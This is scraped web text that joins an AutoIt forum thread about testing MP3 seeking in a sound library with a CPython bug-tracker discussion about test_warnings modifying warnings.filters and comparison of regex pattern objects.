September 2008 - 10:22 PM Edited by RazerM, 30 September 2008 - 10:25 PM. Posted 30 September 2008 - 10:42 PM RAW-------------------------- Typ: VLC media file (.mp3) Storlek: 3,84 MB Artister: Linkin Park Längd: 00:03:16 END-------------------------- ERR: $aInfo Not Array Broken link? PM me and I'll send you the file! Posted 30 September 2008 - 11:40 PM Posted 01 October 2008 - 09:02 AM Posted 01 October 2008 - 12:56 PM Posted 01 October 2008 - 03:32 PM RazerM, The beta works fine for me (Vista 32 SP1) - but then I would be surprised if it didn't! RAW-------------------------- Type: MP3 File Size: 6.41 MB Artists: Glow Length: 00:05:50 END-------------------------- ERR: $aInfo Not Array+ The only thing I noticed in this rather longer testing phase was that multiple seeks within the file nearly always led to larger errors in the overall playing time - i.e. the file ended slightly early. This is no doubt because of the rounding to the nearest thousand ms that occurs when the file properties time is converted. Multiple seeks = multiple rounding errors = larger errors. But I cannot see any way of avoiding this as it is inherent in the accuracy of the input data used. Besides, how often will you seek multiple times? And in the case of restarting long audio books or podcasts (which was the original question in the other thread if you remember!) a second or two is not really that important. M23 PS I have added a post to the other thread concerning the origin of the "file properties" code snippet. Just so you know, the "ERR: $aInfo not array" only happens in the test script, this bug is not present in sound.au3Just so you know, the "ERR: $aInfo not array" only happens in the test script, this bug is not present in sound.au3 Vista SP1 Ultimate : RAW-------------------------- Type: MP3 Format Sound Size: 3.34 MB Artists: POPS Length: 00:03:38 END-------------------------- ERR: $aInfo Not Array Edited by RazerM, 02 October 2008 - 04:49 PM. Posted 02 October 2008 - 04:48 PM Edited by RazerM, 07 October 2008 - 09:03 PM. 0 members, 0 guests, 0 anonymous users
http://www.autoitscript.com/forum/topic/30123-sound-udf/page-2?p=585991
CC-MAIN-2014-35
refinedweb
1,203
62.58
git-archimport - Import an Arch repository into git Imports a project from one or more Arch repositories. It will follow branches and repositories within the namespaces defined by the <archive/branch> parameters supplied. If it cannot find the remote branch a merge comes from it will just import it as a regular commit. If it can find it, it will mark it as a merge whenever possible (see discussion below). The script expects you to provide the key roots where it can start the import from an initial import or tag type of Arch commit. It will follow and import new branches within the provided roots. It expects to be dealing with one project only. If it sees branches that have different roots, it will refuse to run. In that case, edit your <archive/branch> parameters to define clearly the scope of the import. git archimport uses tla extensively in the background to access the Arch repository. Make sure you have a recent version of tla available in the path. tla must know about the repositories you pass to git archimport. For the initial import, git archimport expects to find itself in an empty directory. To follow the development of a project that uses Arch, rerun git archimport with the same parameters as the initial import to perform incremental imports. While git archimport will try to create sensible branch names for the archives that it imports, it is also possible to specify git branch names manually. To do so, write a git branch name after each <archive/branch> parameter, separated by a colon. This way, you can shorten the Arch branch names and convert Arch jargon to git jargon, for example mapping a "PROJECT—devo—VERSION" branch to "master". Associating multiple Arch branches to one git branch is possible; the result will make the most sense only if no commits are made to the first branch, after the second branch is created. Still, this is useful to convert Arch repositories that had been rotated periodically. Patch merge data from Arch is used to mark merges in git as well. git does not care much about tracking patches, and only considers a merge when a branch incorporates all the commits since the point they forked. The end result is that git will have a good idea of how far branches have diverged. So the import process does lose some patch-trading metadata. Fortunately, when you try and merge branches imported from Arch, git will find a good merge base, and it has a good chance of identifying patches that have been traded out-of-sequence between the branches.>.
https://www.kernel.org/pub/software/scm/git/docs/v1.7.2.1/git-archimport.html
CC-MAIN-2016-40
refinedweb
437
61.87
Last. Last. Remember that MPI groups and communicators provide a mechanism for parallel code modularity and offer communication contexts for groups of processes. The default communicator, MPI_COMM_WORLD, refers to all processes involved in the MPI computation and defines the default global context for message passing. Additional communicators — which provide a handle for a communications “channel” like on a CB radio — can be created and destroyed to suite the needs of a parallel code or a coupled model. Communicators are significant because they provide a group scope for collective operations, such as broadcasts, gathers/scatters, and reductions. If these operations are relevant only on a subset of processes, communicators provide a communications channel for one or more process groups. Intracommunicators, which provide for point-to-point and collective communications within a group of processes, were introduced in Part 1. That discussion continues this month along with an introduction to intercommunicators, which provide point-to-point communication between two groups of processes. As in previous columns, MPI routines and descriptions are based on the MPI-1.1 Standard. MPI-2 provides additional features, and some MPI-2 implementations are beginning to appear on clusters and supercomputers. The MPICH implementation (available online at mpi/mpich/index. html) is used for the examples below. Error checking is absent in the examples due to space limitations. Partitioning Tasks Among Processes In Part 1, we learned that multiple contexts (by having multiple communicators) provide a safe way to overlap communications and to overlap message tags. This sort of modularity is required when combining models or when implementing a parallel library, so that message passing within the library routines does not interfere with that performed in the user’s code. This feature of communicators was demonstrated with a library call that performed a simple matrix transpose. We’ve already seen two communicator constructors: MPI_Comm_dup(), which duplicates an existing communicator, and MPI_Comm_create(), which creates a new communicator from a process group definition. The third constructor, MPI_Comm_split(), partitions a group of processes associated with an existing communicator into non-overlapping subgroups. While some parallel applications are designed to create new processes dynamically as needed to perform discrete parallel tasks, standard MPI codes typically initiate all processes at the beginning of a run. Then, at some point within the code, those processes are partitioned into subgroups that perform specific tasks or run certain submodels. The MPI_Comm_split() routine provides a powerful mechanism for splitting up processes into subgroups based on a requested subgroup number or “color.” The function (see its syntax in Table One) partitions the group associated with comm into disjoint subgroups, one for each value of color. Each subgroup contains all of the processes of the same color, and the processes are ranked in the order defined by the value of the key argument. Ties among processes with the same color and key arguments are broken according to their rank in the old group. The function automatically creates a new communicator for each subgroup. Table One: MPI routines for manipulating communicators ACCESSORS int MPI_Comm_size(MPI_Comm comm, int *size) int MPI_Comm_rank(MPI_Comm comm, int *rank) int MPI_Comm_compare(MPI_Comm comm1, MPI_Comm comm2, int *result) CONSTRUCTORS int MPI_Comm_dup(MPI_Comm comm, MPI_Comm *newcomm) int MPI_Comm_create(MPI_Comm comm, MPI_Group group, MPI_Comm *newcomm) int MPI_Comm_split(MPI_Comm comm, int color, int key, MPI_Comm *newcomm) DESTRUCTORS int MPI_Comm_free(MPI_Comm *comm) Listing One contains a C program, split.c, that demonstrates the use of the MPI_Comm_split() routine. As usual, the MPI header file (mpi.h) is included at the top. Inside main(), MPI is initialized with MPI_Init(), and the rank, size, and processor name are obtained from calls to MPI_Comm_rank(), MPI_Comm_size(), and MPI_Get_processor_name(), respectively. Like previous examples, this information is printed to the display beginning with “Hello world!” Notice that this time, rank and size are 2-element arrays; that’s because another value for process rank and communicator size will be obtained after the processes are partitioned. Listing One: split.c demonstrates MPI_Comm_split() #include <stdio.h> #include “mpi.h” int main(int argc, char **argv) { int rank[2], size[2], namelen, color; char processor_name[MPI_MAX_PROCESSOR_NAME]; char *cname[] = { “BLACK”, “WHITE”, “BLUE” }; MPI_Comm comm_work;]); MPI_Comm_free(&comm_work); MPI_Finalize(); } Next, a color value (which must be a non-negative integer) is set to the rank of the process in the global context modulo 3. As a result, three different color values are established and three groups are defined as long as at least three processes are available. The cname[] array contains the names for these three groups: BLACK, WHITE, and BLUE. Now that each process has a color, the three new communicators can be easily and simultaneously created by calling MPI_Comm_split(). The first argument, MPI_COMM_WORLD, is the originating communicator. The color argument is 1, 2, or 3. The key value is rank[0], the rank of the process in the originating communicator. By using the original rank as the key, the rank order is preserved in the new context. Finally, the fourth argument, &comm_work, is a pointer to the new communicator on each process. This call actually generates three unique new communicators, one for each new context as shown in Figure One. The new rank and size are obtained by calls to MPI_Comm_ rank() and MPI_Comm_size(), using the new communicator comm_work. Each process then prints out its new rank, size, and color/context name. At this point in a real model, the processes in each context would work collectively on some computation, and afterward may return to the global context to summarize results. At the end of the code, the new communicator is destroyed using MPI_Comm_free(), and MPI is shut down with MPI_Finalize(). The results of compiling and running split.c on eight processes is shown in Figure Two. As usual, the output is in no particular order. Notice that process zero becomes rank 0 in the BLACK context, one becomes rank 0 in the WHITE context, two becomes rank 0 in the BLUE context, and so on, as shown in Figure One. Figure Two: Running split.c [forrest@node01 comm]$ mpicc -O -o split split.c [forrest@node01 comm]$ mpirun -np 8 split Hello world! I’m rank 0 of 8 on node01 0: I’m rank 0 of 3 in the BLACK context Hello world! I’m rank 6 of 8 on node07 6: I’m rank 2 of 3 in the BLACK context Hello world! I’m rank 3 of 8 on node04 3: I’m rank 1 of 3 in the BLACK context Hello world! I’m rank 4 of 8 on node05 4: I’m rank 1 of 3 in the WHITE context Hello world! I’m rank 7 of 8 on node08 7: I’m rank 2 of 3 in the WHITE context Hello world! I’m rank 2 of 8 on node03 2: I’m rank 0 of 2 in the BLUE context Hello world! I’m rank 5 of 8 on node06 5: I’m rank 1 of 2 in the BLUE context Hello world! I’m rank 1 of 8 on node02 1: I’m rank 0 of 3 in the WHITE context For completeness, a table of all the MPI routines used to manipulate communicators (Table One) and a table of all the routines for manipulating groups (Table Two) are included here. All three communicator constructors have been demonstrated in examples. Only a couple of the group constructors were included in the examples, but it turns out that a wide variety of group constructors is available for defining process groups. Table Two: MPI routines for manipulating groups ACCESSORS int MPI_Group_size(MPI_Group group, int *size) int MPI_Group_rank(MPI_Group group, int *rank) int MPI_Group_translate_ranks (MPI_Group group1, int n, int *ranks1, MPI_Group group2, int *ranks2) int MPI_Group_compare(MPI_Group group1,MPI_Group group2, int *result) CONSTRUCTORS int MPI_Comm_group(MPI_Comm comm, MPI_Group *group) int MPI_Group_union(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup) int MPI_Group_intersection(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup) int MPI_Group_difference(MPI_Group group1, MPI_Group group2, MPI_Group *newgroup) int MPI_Group_incl(MPI_Group group, int n, int *ranks, MPI_Group *newgroup) int MPI_Group_excl(MPI_Group group, int n, int *ranks, MPI_Group *newgroup) int MPI_Group_range_incl(MPI_Group group, int n, int ranges[][3], MPI_Group *newgroup) int MPI_Group_range_excl(MPI_Group group, int n, int ranges[][3], MPI_Group *newgroup) DESTRUCTORS int MPI_Group_free(MPI_Group *group) Using Intercommunicators to Pass Messages Between Groups Up to now, all the communicators discussed have been intracommunicators. These are used to communicate within a group of processes. Another type of communicator, called an intercommunicator, makes it possible to communicate between two groups of processes. Intercommunicators can be used for all point-to-point communications (MPI_Send(), MPI_Recv(), etc.), but may not be used to perform collective operations. This limitation goes away in MPI-2, but for those using MPI-1, these collective operations can be implemented by the programmer using combinations of MPI-1 routines. An intercommunicator is created by a collective call, MPI_Intercomm_create(), executed in the two groups to be connected. Arguments to this call (see Table Three) are the local intracommunicator, the local process leader (i.e., the rank of a process in the local context), a peer or parent communicator, the rank of the remote group’s leader in the peer/parent communicator context, a “safe” message tag to be used for communications between the process leaders, and a pointer to the new intercommunicator. Table Three: MPI routines for manipulating intercommunicators ACCESSORS int MPI_Comm_test_inter(MPI_Comm comm, int *flag) int MPI_Comm_remote_size(MPI_Comm comm, int *size) int MPI_Comm_remote_group(MPI_Comm comm, MPI_Group *group) CONSTRUCTORS int MPI_Intercomm_create(MPI_Comm local_comm, int local_leader, MPI_Comm peer_comm, int remote_leader, int tag, MPI_Comm *newintercomm) OPERATIONS int MPI_Intercomm_merge(MPI_Comm intercomm, int high, MPI_Comm *newintracomm) DESTRUCTORS int MPI_Comm_free(MPI_Comm *comm) Both groups must select the same peer communicator, and the peer communicator must contain all the members of the two groups for which the intercommunicator is being created. Although the rank of the process leader in each group does not matter, all participants in the operation must nominate the same process. Intercommunicators can be destroyed using the same call used to destroy intracommunicators: MPI_Comm_free(). Listing Two contains a modified version of the split.c code called split-inter.c, that performs a point-to-point communication within the local group (after the processes are partitioned with MPI_Comm_split()) then links the BLACK and WHITE contexts with an intercommunicator. This intercommunicator is then used to pass a value from each of the BLACK group members to the WHITE group members with the corresponding local ranks. These operations are illustrated in Figure Three. Listing Two: split-inter.c #include <stdio.h> #include “mpi.h” int main(int argc, char **argv) { int rank[2], size[2], namelen, color; char processor_name[MPI_MAX_PROCESSOR_NAME]; char *cname[] = { “BLACK”, “WHITE”, “BLUE” }; int i, buf, val; MPI_Comm comm_work, intercomm; MPI_Status status;]); val = rank[1]; if (rank[1]) { /* Have every local worker send its value to its local leader */ MPI_Send(&val, 1, MPI_INT, 0, 0, comm_work); } else { /* Every local leader receives values from its workers */ for (i = 1; i < size[1]; i++) { MPI_Recv(&buf, 1, MPI_INT, i, 0, comm_work, &status); val += buf; } printf(”%d: Local %s leader sum = %dn”, rank[0], cname[color], val); } /* Establish an intercommunicator for message passing between the BLACK and WHITE groups */ if (color < 2) { if (color == 0) { /* BLACK Group: create intercommunicator and send to * corresponding member in WHITE group */ MPI_Intercomm_create(comm_work, 0, MPI_COMM_WORLD, 1, 99, &intercomm); MPI_Send(&val, 1, MPI_INT, rank[1], 0, intercomm); printf(”%d: %s member; sent value = %dn”, rank[0], cname[color], val); } else { /* WHITE Group: create intercommunicator and receive * from corresponding member in BLACK group */ MPI_Intercomm_create(comm_work, 0, MPI_COMM_WORLD, 0, 99, &intercomm); MPI_Recv(&buf, 1, MPI_INT, rank[1], 0, intercomm, &status); printf(”%d: %s member; received value = %dn”, rank[0], cname[color], buf); } MPI_Comm_free(&intercomm); } MPI_Comm_free(&comm_work); MPI_Finalize(); } The first part of the code is the same as in split.c, but after the new rank, size, and color are printed, each process sets val to the value of its (local) rank in the new context. If that rank is not zero, the process sends this value to the process of rank 0 in the local context, using MPI_Send(). Correspondingly, the processes of rank 0 in the local context loop over each process in the local group, receiving the sent values using MPI_Recv(). The rank zero processes accumulate these values into val, and then print them. Next, an intercommunicator is established between the BLACK context and the WHITE context. Only processes with a value of color less than 2 execute this block of code, because processes in the BLUE context are not involved in establishing this intercommunicator. The BLACK and WHITE groups establish the intercommunicator by calling MPI_Intercomm_ create() with consistent arguments. The first argument is the local communicator, called comm_work in both contexts. The second argument is the local process leader; all processes nominate the local process of rank 0 as leader. The peer intracommunicator in the third argument is the one to which all affected processes belong. Here MPI_COMM_ WORLD is used. The fourth argument is the rank of the remote leader in the context of the peer intracommunicator. For the BLACK group, the remote leader is process zero in the WHITE context, which is process one in MPI_COMM_WORLD. For the WHITE group, the remote leader is process zero in the BLACK context, which is process zero in MPI_COMM_WORLD. A tag value of 99 is provided as the fifth argument. This value of tag must be the same in both calls to MPI_ Intercomm_create(). It should represent a “safe” tag for communications between the two process leaders in the MPI_COMM_WORLD context; therefore, this tag should not be used anywhere else in the code. Finally, a pointer to the new intercommunicator (&intercomm) is supplied as the sixth argument. Once the intercommunicator has been established, the processes in the BLACK group send the contents of val to the processes with the corresponding rank in the WHITE context. This is accomplished by calling MPI_Send() using the local rank (rank[1]) as the destination and the new intercommunicator (intercomm) as the communicator. Likewise, members of the WHITE group call MPI_Recv(), using the local rank as the source along with the new intercommunicator just created. After the point-to-point communication completes, processes in both groups report the values sent or received. Then the intercommunicator is destroyed using MPI_Comm_free(), the intracommunicator comm_work is freed, and MPI is finalized using MPI_Finalize(). Figure Four shows the results of compiling and running split-inter on 8 processes. As with split.c, each process prints a “Hello, world!” message followed by the rank and size of the global context along with the processor hostname. When the new intracommunicator is created, each process prints the rank, size, and color of the new context. Figure Four: The output of split-inter.c [forrest@node01 comm]$ mpicc -O -o split-inter split-inter.c [forrest@node01 comm]$ mpirun -np 8 split-inter Hello world! I’m rank 0 of 8 on node01 0: I’m rank 0 of 3 in the BLACK context 0: Local BLACK leader sum = 3 0: BLACK member; sent value = 3 Hello world! I’m rank 6 of 8 on node07 6: I’m rank 2 of 3 in the BLACK context 6: BLACK member; sent value = 2 Hello world! I’m rank 2 of 8 on node03 2: I’m rank 0 of 2 in the BLUE context 2: Local BLUE leader sum = 1 Hello world! I’m rank 1 of 8 on node02 1: I’m rank 0 of 3 in the WHITE context 1: Local WHITE leader sum = 3 1: WHITE member; received value = 3 Hello world! I’m rank 4 of 8 on node05 4: I’m rank 1 of 3 in the WHITE context 4: WHITE member; received value = 1 Hello world! I’m rank 7 of 8 on node08 7: I’m rank 2 of 3 in the WHITE context 7: WHITE member; received value = 2 Hello world! I’m rank 5 of 8 on node06 5: I’m rank 1 of 2 in the BLUE context Hello world! I’m rank 3 of 8 on node04 3: I’m rank 1 of 3 in the BLACK context 3: BLACK member; sent value = 1 Next, local process leaders (those processes with a rank of zero in the new context) print out the sum of values received from the other process group members. The local process leaders have ranks of zero (BLACK leader), one (WHITE leader), and two (BLUE leader) in the global context. The sums for BLACK and WHITE are 3; the sum for BLUE is 1. Finally, the BLACK members all report the values they sent over the intercommunicator; the WHITE members all report the values they received. It should be clear that BLACK 0 sent to WHITE 0, BLACK 1 sent to WHITE 1, and BLACK 2 sent to WHITE 2, which maps to 0 sending 1, 3 sending to 4, and 6 sending 7 in the global (MPI_COMM_WORLD) context. A Lot of Power As you can see, MPI offers a powerful set of tools for manipulating process groups and communicators. These constructs allow for good code modularity, portable parallel library creation, and easy coupling of multi-task models. In addition, intercommunicators can be established as needed to provide communications between process groups. This article rounds out a set of columns on advanced features of MPI. When MPI is used for message passing, some pretty neat things can be done on parallel computers.
http://www.linux-mag.com/id/1412
crawl-002
refinedweb
2,901
50.67
Net Present Value & Rate of Return for a winning Powerball lottery ticket Please see attached file for further detail. Question 2 - Net Present Value You have just paid $20 million in the secondary market for the winning Powerball lottery ticket. The prize is $2 million at the end of each year for the next 25 years. If your required rate of return is 8 percent, what is the net present value (NPV) of the deal? Internal Rate of Return What is the internal rate of return (IRR) of the Powerball deal in question 2? Modified Internal Rate of Return What is the modified internal rate of return (MIRR) of the Powerball deal in question 2? Expected Rate of Return of Corporate Bond Assume that Intel Corporations $1,000 face value 9 percent coupon rate bond matures in 10 years and sells for $1,100. If you purchase the bond for $1,100 and hold it to maturity, what will be your average annual rate of return on the investment? Solution Summary The net present value and rate of return for a winning powerball lottery ticket is determined. The internal rate of return is determined.
https://brainmass.com/business/capital-budgeting/263920
CC-MAIN-2017-39
refinedweb
194
69.01
Red Hat Bugzilla – Bug 1469467 [abrt] relval: login(): client.py:496:login:mwclient.errors.LoginError: (<Site object '('https', 'fedoraproject.org')/w/'>, {'result': 'WrongPass'}) Last modified: 2017-07-24 02:56:54 EDT Created attachment 1296168 [details] File: backtrace Created attachment 1296169 [details] File: cgroup Created attachment 1296170 [details] File: cpuinfo Created attachment 1296171 [details] File: environ Created attachment 1296172 [details] File: mountinfo Created attachment 1296173 [details] File: namespaces Created attachment 1296174 [details] File: open_fds As to the problem itself: the wiki sometimes seems to just *do* this, triggering a WrongPass error for a perfectly valid username/password combination. I've never been able to figure out why. If you actually did enter your password correctly, please just try this again, and if it works, there's nothing I can really do about this, it's some issue on the wiki side. If you *consistently* get a WrongPass error for what you think is the correct username and password, that's a different question. It happened once. Then yeah, it's some kind of intermittent mistake on the server side that I can't really do anything about on the client end, so I'm afraid we'll have to close the ticket. Sorry! I have asked our admins if they can figure out what's going wrong on the server end before (I see these same errors in my own use of relval/wikitcms sometimes), but they haven't been able to figure it out yet...
https://bugzilla.redhat.com/show_bug.cgi?id=1469467
CC-MAIN-2018-30
refinedweb
246
54.86
You can import data profiling items including analyses, database connections, patterns and indicators, etc. into you current studio from various projects or different versions of the studio. You can not import an item without all its dependencies. When you try to import an analysis for example, all its dependencies such as a metadata connection and the patterns and indicators used in this analysis will be selected by default and imported with the analysis. However, when you import analyses from a reference project, only the analyses are imported without their items. For example, metadata connections are not imported with them and you must set the connection manually after importing the analyses to make them work correctly. For further information about reference projects, see Working with referenced projects. Warning You can not import into your current studio data profiling items created in versions older than 4.0.0. To use such items in your current studio, you must carry out an upgrade operation. For further information, see Upgrading project items from older versions. If you have data integration items (Jobs, metadata connections, etc.) that you need to import alongside with your data profiling items, you can do one of the following: import the data integration items from the Integration perspective, and the data profiling items from the Profiling perspective of your studio. All items will be imported with their dependencies. For example, when you import a Job with data quality components, dependencies are imported as well such as the metadata connection and the patterns used by the data quality components. Note If you have connections shared between your data integration Jobs and your data profiling analyses, it is better to start by importing your data integration items and then move to import those of data profiling. import data integration and data profiling items simultaneously from the studio login window through importing the project file created in the studio of the older version. For further information about importing local projects from the login window, see How to import local projects. Prerequisite(s): You have selected the Profiling perspective of the studio. You have access to the root directory of another studio version in which data profiling and data integration items have been created. To import one or more data profiling items, do the following: In the Profiling perspective, either: Right-click anywhere in the DQ Repository tree view and select Import Items. Click the icon on the toolbar and select Import Items. All editors which are open in the studio are automatically closed. The [Import Item] wizard is displayed. Select the root directory or the archive file option according to whether the data profiling items you want to import are in the workspace file within the studio directory or are already exported into a zip file. If you select the root directory option, click Browse and set the path to the project folder containing the items to be imported within the workspace file of the studio directory. All items and their dependencies that do not exist in your current Studio are selected by default in the dialog box. If you select the archive file option, click Browse and set the path to the archive file that holds the data profiling items you want to import. All items and their dependencies that do not exist in your current studio are selected by default in the dialog box. Select the Overwrite existing items check box if some error and warning messages are listed in the Error and Warning area. This means that items with the same names already exist in the current studio. The imported items will replace the existing ones. When you import system indicators that are modified in a studio version, they will not overwrite the indicators in the current studio. All modifications from older versions will be integrated with the system indicators in the current studio. Select or clear the check boxes of the data profiling items you want or do not want to import according to your needs. All dependencies for the selected item are selected by default. When you clear the check box of an item, the check boxes of the dependencies of this item are automatically cleared as well. Also, an error message will display on top of the dialog box if you clear the check box of any of the dependencies of the selected item. Click Finish to validate the operation. The imported items display under the corresponding folders in the DQ Repository tree view. You can also import local project folders from the login window of your studio. For further information, see the Getting Started Guide.. Do the following to have every item in the imported project working correctly: Run the analyses that have Java as their execution engine. This will compute and store locally the results of the indicators used in the analyses. You can not open a list of the indicator results in the Analysis Results view in the current studio without running the analyses first as data is not imported with them from the old studio. Install missing third-party Java libraries or database drivers. When you import database connections for the first time, warning red icons may be docked on the connection names. This is because Tal the studio. For more information about identifying and installing external modules, see the Talend Installation Guide. Set the path for the drivers of the SQL Servers (2005 or 2008). If you import SQL Servers (2005 or 2008) connections into your current studio, a warning red icon is docked on the connection names in the DB connections folder. This indicates that the driver path for these connections is empty. You must open the connection wizard and redefine the connection manually to set the path to a JDBC driver you can download from the Microsoft download center. For further information on editing a database connection, see How to open or edit a database connection. You can also set the path to a JDBC driver for a group of database connections simultaneously in order not to define them one by one. For further information, see Migrating a group of connections.
https://help.talend.com/reader/UiLqXAv52hAS8fVDfvtn8w/oQgWna9Ft30F_Qq8cD5x4g
CC-MAIN-2020-10
refinedweb
1,021
52.7
Eclipse Community Forums - RDF feed Eclipse Community Forums how to debug like the tool "decoda"? <![CDATA[I write some function in x.lua file, and I call the lua function from my C program. I want to debug the lua function called by the C program using Koneki/ldt just like the tool "decoda", how to do that? ]]> Guangcheng Huang 2012-11-09T10:07:35-00:00 Re: how to debug like the tool "decoda"? <![CDATA[Hi Guangcheng, Maybe by using the "Attach Debug" as explain here: If you use a 0.9 version of LDT, a better and more complete documentation can be found here: And download the debugger file here. If it doesn't work please explain your case with more details. Marc]]> Marc Aubry 2012-11-09T14:38:51-00:00 Re: how to debug like the tool "decoda"? <![CDATA[edit: duplicate message -_-]]> Marc Aubry 2012-11-09T14:39:51-00:00 Re: how to debug like the tool "decoda"? <![CDATA[thank you!]]> Guangcheng Huang 2012-11-10T08:20:40-00:00 Re: how to debug like the tool "decoda"? <![CDATA[1, My lua file is: -- t.lua function L_add(x, y) return x + y end 2, My C++ program file is: // test.cpp #include <stdio.h> #ifdef __cplusplus extern "C" { #endif /* __cplusplus */ #include <lua.h> // lua是用纯c语言写的 #include <lualib.h> #include <lauxlib.h> #ifdef __cplusplus } #endif /* __cplusplus */ lua_State* L = NULL; int Add(int x, int y) { int savedTop = lua_gettop(L); int sum = 0; lua_getglobal(L, "L_add"); // 'L_add' is the function defined in file 't.lua' lua_pushnumber(L, x); // the first argument lua_pushnumber(L, y); // the second argument lua_call(L, 2, 1); // call the function with 2 arguments, return 1 result sum = (int) lua_tonumber(L, -1); lua_pop(L, 1); lua_settop(L, savedTop); return sum; } int main(int argc, char* argv[]) { L = luaL_newstate(); if (!L) { return -1; } luaL_dofile(L, "t.lua"); while (true) { int sum = Add(10, 15); printf("The sum is %d\n", sum); //sleep(1); } lua_close(L); return 0; } 3, In the C++ program, it calls lua function 'L_add'. Now I want to use koneki/ldt to debug it. I toggle a breakpoint in 'L_add' function and start the C++ program. I expect the breakpoint will be hit when 'L_add' is called in the C++ program. I really confused how to do that even after I read the manual you give. Would you please tell me step by step? Thank you very much! By addition, I advise you write your manual by runnable example otherwise by spoon-feeding. Welcome to use my code snippet here! (PS. some diagrams in the manual mismatch the 0.9 milestone executable version itself) ]]> Guangcheng Huang 2012-11-13T17:45:50-00:00 Re: how to debug like the tool "decoda"? <![CDATA[Are you there, my friend??]]> Guangcheng Huang 2012-12-05T06:49:30-00:00 Re: how to debug like the tool "decoda"? <![CDATA[Hi Guangcheng, Sorry for the late response. Can you be a bit more precise of what you don't understand in the documentation ? Maybe some point can be unclear. Otherwise, here some simple step to perform lua attached debug: first) Ensure to call the lua code by putting a print in the lua, or return a value and retrieve this one in the C code. requirement) the lua global variable "package.path" in the lua must contains a path to luasocket libraries/binaries. 1) Add the following line at the beginning of your lua file: require("debugger")() -- t.lua function L_add(x, y) return x + y end 2) Create and launch a attach debug configuration using the "Run/Debug Configuration" top menu. You don't have to configure the launch configuration as default values are pretty fine. 3) Launch the C program to call the lua code. Please tell me if you still have some trouble. Marc]]> Marc Aubry 2012-12-10T15:53:43-00:00
http://www.eclipse.org/forums/feed.php?mode=m&th=432743&basic=1
CC-MAIN-2013-20
refinedweb
650
75.71
Created on 2016-11-14 12:56 by vstinner, last changed 2016-11-22 08:47 by vstinner. This issue is now closed. The issue #23839 modified the test runner to always clear caches before running tests. As a side effect, test_warnings started to complain with: Warning -- warnings.filters was modified by test_warnings The issue comes from the following function of test_warnings/__init__.py: def setUpModule(): py_warnings.onceregistry.clear() c_warnings.onceregistry.clear() I suggest to rewrite this function as a setUp/tearDown method in BaseTest and *restores* the old value of these dictionaries. I guess that the bug affects all Python versions, even if only Python 3.7 logs a warning. How you got this warning? I can't reproduce. > How you got this warning? I can't reproduce. Sorry, I forgot to mention that the warning only occurs if you run Python with -Werror: @selma$ ./python -Werror -m test test_warnings Run tests sequentially 0:00:00 [1/1] test_warnings Warning -- warnings.filters was modified by test_warnings test_warnings failed (env changed) 1 test altered the execution environment: test_warnings Total duration: 2 sec Tests result: SUCCESS Moreover, the warning goes away if you don't run tests in verbose mode!? haypo@selma$ ./python -Werror -m test -v test_warnings ... 1 test OK. Total duration: 2 sec Tests result: SUCCESS test___all__ gets the same behaviour. ./python -Werror -m test test___all__ Run tests sequentially 0:00:00 [1/1] test___all__ Warning -- warnings.filters was modified by test___all__ test___all__ failed (env changed) 1 test altered the execution environment: test___all__ Total duration: 1 sec Tests result: SUCCESS And on my PC in company I sometimes get the behaviour for test_distutils. I originally thought this is not a problem. Hum, this issue is a regression caused by the issue #23839. The environment warning was already fixed by the issue #18383 (duplicate: issue #26742): New changeset f57f4e33ba5e by Martin Panter in branch '3.5': Issue #18383: Avoid adding duplicate filters when warnings is reloaded The problem is that _sre.SRE_Pattern doesn't import rich compare: so two patterns are only equal if it's exactly the same object... which is likely when re caches the compiled expression... But the Python test runner now starts by clearing the re cache! I see different options: * Find something else to not re-initialize warning filters, "_processoptions(sys.warnoptions)" in warnings.py. * Fix warnings._add_filter() to implement a custom comparator operator for regular expression objects: compare pattern and flags * Implement comparision in _sre.SRE_Pattern > * Implement comparision in _sre.SRE_Pattern I wrote a patch and opened the issue #28727: "Implement comparison (x==y and x!=y) for _sre.SRE_Pattern". > * Fix warnings._add_filter() to implement a custom comparator operator for regular expression objects: compare pattern and flags Attached patch warnings_key.patch implements this. I really dislike the patch :-( FYI Python 2.7 is not impacted by this bug because it seems like reimporting warnings.py twice gets a new fresh list from _warnings.filters. I don't undertand how/why. I didn’t really like adding the _add_filter() special handling in the first place, but I went ahead because I couldn’t think of a better way to avoid the problem with reloading the warnings modules. So unless anyone can suggest anything better, I am okay with your patch (even if you dislike it :). + return (item[0], _pattern_key(item[1]), item[2], _pattern_key(item[3])) The key is based on (action, message, category, module). I think you should add item[4] (lineno). > The key is based on (action, message, category, module). I think you should add item[4] (lineno). Oops, right! Ok, let me propose a plan for 3.5, 3.6 and 3.7: * Remove warnings.filters test on Python 3.5 from regrtest * Implement comparison for SRE_Pattern in Python 3.6 and 3.7: issue #28727 I consider that the issue #28727 is a minor enhancement and so is still good for Python 3.6. So we avoid the ugly *warnings_key.patch*. Reminder: this issue only occurs in the Python test suite which explicitly reloads modules. It should not occur in the wild. Your plan LGTM. Here is another way to remember that the filter list has already been initialized. I made a new immortal _warnings.filters_initialized flag at the C level. It is actually a list so that it can be mutated and remembered across module reloads, but it is either empty (evaluates as false), or a single element: [True]. Also, Python 2 does get duplicated filters, but I guess there is not test that exposes it. $ python2 -Wall . . . >>> import warnings >>> len(warnings.filters) 5 >>> reload(warnings) <module 'warnings' from '/usr/lib/python2.7/warnings.pyc'> >>> len(warnings.filters) 6 I agree there is no need to change Python 2 at this stage. New changeset 75b1091594f8 by Victor Stinner in branch '3.5': Issue #28688: Remove warnings.filters check from regrtest New changeset a2616863de06 by Victor Stinner in branch '3.6': Issue #28688: Null merge 3.5 New changeset da042eec6743 by Victor Stinner in branch 'default': Issue #28688: Null merge 3.6 I implemented x==y operator for _sre.SRE_Pattern in Python 3.6 and 3.7, it fixed this issue. For Python 3.5, I removed the warnings.filters test, as we discussed. @Martin Panter: immortal-filters.patch works because I'm not super excited by the change. Somehow, it looks like a hack... even if I don't see any better solution for Python 3.5. Since the bug only impacts Python test suite in the practical, is it really worth it to fix it in Python 3.5 which is almost in the "security fix only" stage? @Martin: It's up to you, I have no strong opinion on your patch. > I agree there is no need to change Python 2 at this stage. Ok. As long as we are restricted by backwards compatibility, it will be hard to find a hack-free solution. The ideal solution IMO is to re-create _warnings.filters from scratch when _warnings is reloaded, but such a change would be safer only for 3.7. So I am happy to leave things as they are. At least until something upsets things again :) I'm ok to close this bug :-) > As long as we are restricted by backwards compatibility, it will be hard to find a hack-free solution. The ideal solution IMO is to re-create _warnings.filters from scratch when _warnings is reloaded, but such a change would be safer only for 3.7. Currently it's not possible to "reload" the _warnings module since it 